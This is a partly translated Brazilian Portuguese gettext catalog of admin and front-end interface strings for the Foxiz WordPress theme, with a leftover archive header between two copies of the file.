msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK!G2YY*languages/pt_BR-backup-202209012329190.po~nu[msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2022-09-01 23:12+0000\n" "Last-Translator: \n" "Language-Team: Português do Brasil\n" "Language: pt_BR\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Loco https://localise.biz/\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;" "esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;" "_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" "Report-Msgid-Bugs-To: \n" "X-Loco-Version: 2.6.2; wp-6.0.2" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" " "will not apply to Ruby template shortcode." msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "%s Comentários" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "%s comentários" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 #: backend/configs.php:71 backend/configs.php:106 backend/configs.php:161 #: backend/configs.php:195 backend/configs.php:209 backend/configs.php:236 #: backend/configs.php:288 backend/configs.php:319 backend/configs.php:357 #: backend/configs.php:373 backend/configs.php:424 backend/configs.php:499 #: backend/configs.php:524 backend/configs.php:542 backend/configs.php:559 #: backend/configs.php:583 backend/configs.php:607 backend/configs.php:634 #: backend/configs.php:693 backend/configs.php:732 backend/configs.php:771 #: backend/configs.php:801 backend/configs.php:822 backend/mega-menu.php:139 #: backend/mega-menu.php:150 backend/panels/blog-pages.php:324 #: backend/panels/blog-pages.php:493 backend/panels/blog-pages.php:523 #: backend/panels/blog-pages.php:811 backend/panels/blog-pages.php:980 #: backend/panels/blog-pages.php:1010 backend/panels/blog-pages.php:1394 #: backend/panels/blog-pages.php:1424 backend/panels/blog-pages.php:1633 #: backend/panels/blog-pages.php:1802 backend/panels/blog-pages.php:1832 #: backend/panels/blog-pages.php:2125 backend/panels/blog-pages.php:2294 #: backend/panels/blog-pages.php:2324 backend/panels/bookmark.php:227 #: backend/panels/bookmark.php:392 backend/panels/bookmark.php:414 #: backend/panels/bookmark.php:675 backend/panels/bookmark.php:840 #: backend/panels/bookmark.php:870 backend/panels/design.php:578 #: backend/panels/design.php:595 backend/single-metaboxes.php:60 #: backend/single-metaboxes.php:73 backend/single-metaboxes.php:132 #: backend/single-metaboxes.php:223 backend/single-metaboxes.php:360 #: backend/single-metaboxes.php:408 backend/single-metaboxes.php:487 #: backend/single-metaboxes.php:507 backend/single-metaboxes.php:652 #: backend/single-metaboxes.php:714 backend/single-metaboxes.php:726 #: backend/single-metaboxes.php:824 backend/single-metaboxes.php:843 #: backend/single-metaboxes.php:862 backend/single-metaboxes.php:874 #: backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 #: backend/panels/bookmark.php:573 backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 #: backend/panels/amp.php:423 backend/panels/amp.php:484 #: backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 #: backend/panels/amp.php:451 backend/panels/amp.php:512 #: backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 Column" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "1 Comentário" #: templates/entry.php:555 msgid "1 comment" msgstr "1 comentário" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 #: backend/panels/header.php:130 msgid "2 Columns" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 #: backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 #: backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 #: backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "Aceitar" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 #: backend/panels/ads.php:280 backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: backend/panels/header.php:573 msgid "" "Adding a custom logo for the login form. Leave blank to set it as the " "default." msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to " "the numeric type for other archive pages." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid 